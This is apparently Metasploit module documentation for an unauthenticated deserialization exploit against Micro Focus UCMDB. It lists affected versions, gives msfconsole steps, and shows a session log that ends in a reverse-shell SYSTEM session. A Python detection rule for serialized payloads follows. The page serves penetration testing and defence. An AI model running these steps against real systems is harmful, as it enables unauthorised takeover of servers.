metasploit-gs/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md
2021-01-27 10:00:02 -05:00

Vulnerable Application

UCMDB is the vulnerable component, and it is integrated into many Micro Focus products. Micro Focus has confirmed that the following products are affected by the hardcoded account vulnerability:

  • Operation Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.6x, 10.1x and older
  • Application Performance Management versions: 9.51, 9.50 and 9.40 with uCMDB 10.33 CUP 3
  • Operations Bridge (containerized) versions: 2019.11, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05, 2018.02, 2017.11

Additional applications are vulnerable to the Java deserialization on its own. Because this module chains both vulnerabilities (the hardcoded account and the deserialization), it should only work against the products listed above.

Installation docs are available at:

Vulnerable versions of the software can be downloaded from the Micro Focus website by requesting a demo.

Both Linux and Windows installations are affected.

NOTE: At the time of writing (24/01/2021), the Metasploit ysoserial Linux payloads (except cmd/unix/generic) are broken. Remove this note once they all work, and change the module's default payload from cmd/unix/generic to cmd/unix/reverse_python.

All details about these vulnerabilities can be obtained from the advisory:

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. use exploit/multi/http/microfocus_ucmdb_unauth_deser
  4. set rhost TARGET
  5. set lhost YOUR_IP
  6. set target 0|1
  7. run
  8. You should get a shell.

Scenarios

msf6 > use exploit/multi/http/microfocus_ucmdb_unauth_deser
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set rhost 10.0.0.100
rhost => 10.0.0.100
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > check
[+] 10.0.0.100:8443 - The target is vulnerable.
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > run

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.100:8443 - Attacking Windows target
[+] 10.0.0.100:8443 - Succesfully authenticated and obtained our cookie!
[*] 10.0.0.100:8443 - Sending payload to /services/DataAcquisitionService
[+] 10.0.0.100:8443 - Success, shell incoming!
[*] Sending stage (175174 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.100:50733) at 2021-01-24 22:16:36 +0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 15244 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\HPBSM\ucmdb\bin>whoami
whoami
nt authority\system

C:\HPBSM\ucmdb\bin>
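The session log above shows the module sending its deserialization payload to /services/DataAcquisitionService. The following is an added detection example, not part of the module or its documentation: a request-inspection rule that flags requests to that endpoint whose body begins with a Java object stream, either raw (the 0xACED0005 stream header) or base64-encoded (the "rO0AB" prefix). The endpoint path comes from the page; the HttpRequest record layout and the sample traffic are constructed for this example.

```python
"""Added example (not the module's own code): flag Java-serialized bodies
sent to the UCMDB endpoint named in the session log."""
import base64
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 5.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
# The same header as it appears once base64-encoded (the familiar "rO0AB" prefix).
JAVA_SERIAL_MAGIC_B64 = base64.b64encode(JAVA_SERIAL_MAGIC)[:5]

# Endpoint the session log shows the payload being sent to (taken from the page).
WATCHED_PATH = "/services/DataAcquisitionService"


@dataclass
class HttpRequest:
    """Minimal request record; the field layout is an assumption of this example."""
    src: str
    method: str
    path: str
    body: bytes


def looks_like_java_serialized(body: bytes) -> bool:
    """True if the body starts with a Java object stream, raw or base64-encoded."""
    head = body.lstrip()
    return head.startswith(JAVA_SERIAL_MAGIC) or head.startswith(JAVA_SERIAL_MAGIC_B64)


def inspect(req: HttpRequest) -> Optional[str]:
    """Return an alert reason for this request, or None when nothing matched.

    The query string is ignored so that '/path?wsdl' still matches the endpoint.
    """
    path = req.path.split("?", 1)[0]
    if path != WATCHED_PATH:
        return None
    if looks_like_java_serialized(req.body):
        return "java-serialized-body"
    return None


def scan(requests: List[HttpRequest]) -> List[Tuple[str, str, str]]:
    """Run inspect() over a batch and collect (source, path, reason) alerts."""
    alerts = []
    for req in requests:
        reason = inspect(req)
        if reason is not None:
            alerts.append((req.src, req.path, reason))
    return alerts


# Constructed sample traffic: two benign requests, two serialized payloads to the
# watched endpoint, and one serialized body to an unrelated path (not flagged here).
SAMPLE_REQUESTS = [
    HttpRequest("10.0.0.50", "GET", "/ucmdb-ui/", b""),
    HttpRequest("10.0.0.50", "POST", WATCHED_PATH, b'<?xml version="1.0"?><soap:Envelope/>'),
    HttpRequest("10.0.0.1", "POST", WATCHED_PATH,
                JAVA_SERIAL_MAGIC + b"sr\x00\x11java.util.HashMap"),
    HttpRequest("10.0.0.1", "POST", WATCHED_PATH + "?wsdl",
                base64.b64encode(JAVA_SERIAL_MAGIC + b"sr\x00\x11java.util.HashMap")),
    HttpRequest("10.0.0.1", "POST", "/other", JAVA_SERIAL_MAGIC),
]


if __name__ == "__main__":
    for src, path, reason in scan(SAMPLE_REQUESTS):
        print(f"ALERT {reason}: {src} -> {path}")
```

The rule is deliberately scoped to the endpoint the page names so it can run with few false positives in front of a UCMDB instance; the last sample request shows that serialized bodies to other paths pass through unflagged, which is where you would widen the path check if other services on the host are also known to deserialize untrusted input.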